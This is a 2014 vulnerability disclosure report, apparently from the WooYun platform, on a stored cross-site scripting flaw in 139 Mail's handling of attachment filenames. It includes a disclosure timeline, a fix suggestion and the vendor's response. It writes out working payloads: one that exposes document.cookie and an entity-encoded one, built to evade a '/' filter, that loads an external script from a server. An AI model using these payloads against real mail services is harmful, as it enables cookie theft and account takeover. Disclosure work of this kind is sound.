139邮箱存储型跨站可加载本地恶意脚本

漏洞详情

披露状态:

2014-03-12: 细节已通知厂商并且等待厂商处理中
2014-03-18: 厂商已经确认,细节仅向厂商公开
2014-03-28: 细节向核心白帽子及相关领域专家公开
2014-04-07: 细节向普通白帽子公开
2014-04-17: 细节向实习白帽子公开
2014-04-26: 细节向公众公开

简要描述:

139邮箱对邮件内容过滤不严格,导致可以加载本地服务器脚本,执行任意javascript代码。

详细说明:

139邮箱处理附件名字段时,遗漏对特殊字符的有效过滤,导致可以截断标签属性值,插入恶意事件并执行任意javascript代码

漏洞证明:

1、发送邮件到139邮箱,邮件附件名改为:

hlespayload.jpg' onmouseover=alert(document.cookie) .jpg

2、打开邮件,当收件人预览或下载附件时,漏洞触发,效果如下图:

1.png



3、使用firebug查看源代码:

2.png



4、修改onerror属性,加载本地服务器脚本:hlespayload.jpg' onmouseover=&#100&#61&#100&#111&#99&#117&#109&#101&#110&#116&#59&#101&#61&#100&#46&#99&#114&#101&#97&#116&#101&#69&#108&#101&#109&#101&#110&#116&#40&#39&#115&#99&#114&#105&#112&#116&#39&#41&#59&#101&#46&#115&#114&#99&#61&#39&#104&#116&#116&#112&#58&#47&#47&#49&#50&#55&#46&#48&#46&#48&#46&#49&#47&#105&#46&#106&#115&#39&#59&#100&#46&#98&#111&#100&#121&#46&#97&#112&#112&#101&#110&#100&#67&#104&#105&#108&#100&#40&#101&#41&#59 .jpg(由于邮箱对'/'进行了过滤,此处需要进行一下编码转换)。

3.png

修复方案:

对附件名字段的特殊字符进行严格过滤

版权声明:转载请注明来源 dilcon@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-03-18 10:12

厂商回复:

CNVD确认所述漏洞情况,已经转由CNCERT直接通报给中国移动集团公司。跨站在邮件系统是较为普遍且存在威胁的,根据触发条件,rank 10。

最新状态:

暂无


漏洞评价: